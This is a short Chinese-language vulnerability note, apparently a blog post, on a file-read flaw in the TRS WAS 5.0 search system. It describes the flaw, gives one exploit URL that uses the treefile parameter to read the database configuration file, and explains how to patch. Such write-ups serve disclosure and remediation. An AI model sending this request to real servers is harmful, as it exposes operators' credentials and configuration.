目录

1、描述

2、过程

3、修复

---

拓尔思TRSWAS5.0文件读取漏洞

注明：网上相关资料较少，进行整理了一下。展示相关的思路

1、描述

拓尔思中文检索系统TRSWAS5.0 web/tree接口treefile参数存在文件读取漏洞，可读取数据库配置文件、账户密码等信息，导致配置文件信息泄露威胁网站安全。

2、过程

http://IP地址//was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

显示文件内容

3、修复

目前官方已经在新的版本中修复该漏洞，可从官方下载进行升级相应组件或者使用附件里的文件trswas.jar替换目录D:\TRS\TRSWAS5.0\Tomcat\webapps\was5\WEB-INF\lib下的文件

 

参考链接：

https://metc.sju.edu.cn/_t24/cf/08/c1063a53000/page.htm

http://jyjs.spvec.com.cn/info/9397/59274.htm

https://www.chaosec.com/?p=1025

https://blog.csdn.net/weixin_46022050/article/details/104622405